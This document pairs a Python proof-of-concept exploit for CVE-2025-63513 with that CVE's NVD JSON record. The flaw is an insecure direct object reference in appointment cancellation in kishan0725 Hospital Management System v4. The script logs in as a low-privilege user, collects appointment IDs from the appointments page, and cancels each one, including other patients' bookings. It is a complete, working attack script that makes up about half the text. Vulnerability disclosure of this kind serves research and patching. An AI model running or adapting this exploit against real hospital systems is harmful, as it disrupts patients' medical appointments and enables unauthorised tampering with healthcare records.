CVE-2025-63513

import requests import re # CVE-2025-63513 PoC - Hospital Management System v4 IDOR in Appointment Cancellation # Target: kishan0725 Hospital Management System v4 # Vulnerability: IDOR in appointment cancellation functionality TARGET_URL = "http://target-website.com" LOGIN_URL = f"{TARGET_URL}/login" APPOINTMENTS_URL = f"{TARGET_URL}/appointments" CANCEL_URL = f"{TARGET_URL}/appointment/cancel" USERNAME = "[email protected]" PASSWORD = "password123" def login(): """Authenticate with low-privilege account""" session = requests.Session() login_data = { 'email': USERNAME, 'password': PASSWORD } response = session.post(LOGIN_URL, data=login_data) return session if response.status_code == 200 else None def get_appointment_ids(session): """Enumerate valid appointment IDs from the system""" response = session.get(APPOINTMENTS_URL) if response.status_code == 200: # Extract appointment IDs from page content pattern = r'appid=(\d+)' return re.findall(pattern, response.text) return [] def cancel_appointment(session, appointment_id): """Exploit IDOR by canceling another user's appointment""" cancel_data = { 'appointment_id': appointment_id, 'action': 'cancel' } response = session.post(CANCEL_URL, data=cancel_data) return response.status_code == 200 def main(): session = login() if not session: print("[-] Login failed") return print("[+] Login successful") appointment_ids = get_appointment_ids(session) for appt_id in appointment_ids: print(f"[*] Attempting to cancel appointment ID: {appt_id}") if cancel_appointment(session, appt_id): print(f"[+] Successfully canceled appointment {appt_id}") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-63513", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:16:10.360", "lastModified": "2025-11-20T21:57:49.427", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "kishan0725 Hospital Management System v4 has an Insecure Direct Object Reference (IDOR) vulnerability in the appointment cancellation functionality."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kishan0725:hospital_management_system:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "826AA929-9CA8-47CB-AB83-CD0007357313"}]}]}], "references": [{"url": "https://github.com/NicatAliyevh/Zero-Days/blob/main/Hospital_Management_System_IDOR.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/kishan0725/Hospital-Management-System/issues/55", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/kishan0725/Hospital-Management-System/issues/55", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}